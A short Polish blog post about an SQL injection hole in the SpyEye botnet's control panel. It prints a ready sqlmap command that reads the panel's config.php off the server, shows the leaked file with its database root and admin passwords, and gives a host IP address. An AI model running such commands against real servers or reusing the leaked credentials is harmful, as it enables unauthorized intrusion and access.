5/5/2011
Nawet oprogramowanie wykorzystujące dziury ma swoje dziury :] Jeden z parametrów w panelu zarządzania SpyEye jest podatny na ataki SQL injection. Aby przy pomocy tego błędu wydobyć plik konfiguracyjny botnetu, można użyć sqlmapa z poniższymi parametrami:
./sqlmap.py -u"http://x.x.x.x/formgrab/frm_findrep_sub2.php?id=1" --file-read=/var/www/formgrab/config.php
Wynik będzie podobny do tego:
cat output/76.73.17.90/files/_var_www_s3_fr3
<?php
# Database
define('DB_SERVER', 'localhost');
define('DB_NAME', 'fra');
define('DB_USER', 'root');
define('DB_PASSWORD', '1234TTab123xsdesd568');
# Admin
define('ADMIN_PASSWORD', 'hdjsd898oiSDKfsdf32423ncc');
?>
Podatność opublikował quantumbenxh, który niezbyt uważnie usunął adres IP zainfekowanego hosta. W jego poście znajdziecie też panel SpyEye — można poszukać kolejnych SQL injections [i innych błędów] na własną rękę.
do bani, avast blokuje mi pobranie sqlmapa